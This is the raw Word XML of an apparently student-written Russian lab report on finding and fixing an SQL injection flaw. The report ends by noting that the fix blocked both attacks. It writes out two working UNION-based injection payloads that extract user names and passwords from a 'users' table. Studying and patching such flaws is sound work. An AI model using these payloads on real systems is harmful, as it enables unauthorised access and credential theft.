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5FF9" w14:textId="63447742" w:rsidR="00FC1E00" w:rsidRPr="000B2C0D" w:rsidRDefault="00AB5CBE">
      <w:r>
        <w:t xml:space="preserve">Обнаружение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sql</w:t>
      </w:r>
      <w:r w:rsidRPr="000B2C0D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">уязвимости </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F4D46BD" wp14:editId="72BC9A2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B84A" w14:textId="4A893E04" w:rsidR="006B4989" w:rsidRPr="00FA3463" w:rsidRDefault="00FA3463">
      <w:r>
        <w:t>Запрос для узнавания логина и пароля из другой таблицы данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BB31C4" w14:textId="73A17E52" w:rsidR="006B4989" w:rsidRDefault="00C71AE8" w:rsidP="00FA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1AE8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%' or 1=1 union all select 123,(select min(name) from users),(select min(pass)  from users) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A4D041" w14:textId="2F75A3C5" w:rsidR="006B4989" w:rsidRDefault="00C71AE8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="069232C2" wp14:editId="33199E0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89E4" w14:textId="36294F3C" w:rsidR="009D42A8" w:rsidRPr="000B2C0D" w:rsidRDefault="009D42A8">
      <w:r>
        <w:t>Вариант</w:t>
      </w:r>
      <w:r w:rsidRPr="009D42A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="009D42A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>отображения</w:t>
      </w:r>
      <w:r w:rsidRPr="009D42A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">всех данных таблицы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7D5FA3" w14:textId="4F8FBCCE" w:rsidR="009D42A8" w:rsidRPr="009D42A8" w:rsidRDefault="009D42A8" w:rsidP="00B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D42A8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%' or 1=1 union SELECT    ROW_NUMBER() OVER() ,   name, pass FROM users --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3483119E" w14:textId="081E4AE6" w:rsidR="009D42A8" w:rsidRPr="009D42A8" w:rsidRDefault="00B06A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2C1B7F" wp14:editId="7ED1482F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69F5" w14:textId="77777777" w:rsidR="009D42A8" w:rsidRPr="009D42A8" w:rsidRDefault="009D42A8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3349558F" w14:textId="2A485FCF" w:rsidR="006B4989" w:rsidRDefault="00FA3463">
      <w:r>
        <w:t>Исправление уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35905560" w14:textId="26B728E2" w:rsidR="00FA3463" w:rsidRPr="00FA3463" w:rsidRDefault="00FA3463">
      <w:r w:rsidRPr="00FA3463">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BA82736" wp14:editId="29B4D9AF">
            <wp:extent cx="5940425" cy="1551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918C" w14:textId="34F68F1D" w:rsidR="006B4989" w:rsidRDefault="006B4989">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DD0A8C" w14:textId="75BD70E5" w:rsidR="006B4989" w:rsidRDefault="00FA34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61BBA6" wp14:editId="3645902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A2A" w14:textId="6033ED08" w:rsidR="009D42A8" w:rsidRDefault="00B06A8F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43193D0C" wp14:editId="12D19C78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DC03" w14:textId="16AC10BD" w:rsidR="009D42A8" w:rsidRPr="00B06A8F" w:rsidRDefault="00B06A8F">
      <w:r>
        <w:t>После исправления оба варианта перестали работать</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="009D42A8" w:rsidRPr="00B06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9"/>
    <w:rsid w:val="000B2C0D"/>
    <w:rsid w:val="00132AF7"/>
    <w:rsid w:val="00193459"/>
    <w:rsid w:val="003F4BBF"/>
    <w:rsid w:val="006747B2"/>
    <w:rsid w:val="006B4989"/>
    <w:rsid w:val="00826643"/>
    <w:rsid w:val="009B3FEA"/>
    <w:rsid w:val="009D42A8"/>
    <w:rsid w:val="00A46C5C"/>
    <w:rsid w:val="00AB5CBE"/>
    <w:rsid w:val="00B06A8F"/>
    <w:rsid w:val="00C71AE8"/>
    <w:rsid w:val="00DB621B"/>
    <w:rsid w:val="00EE0DB9"/>
    <w:rsid w:val="00F26A26"/>
    <w:rsid w:val="00FA3463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B238"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B3A8E214-6DF4-488A-8683-28B5B476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B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6A2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A2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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Маров</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-18T10:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-18T14:24:00Z</dcterms:modified>
</cp:coreProperties>
</file>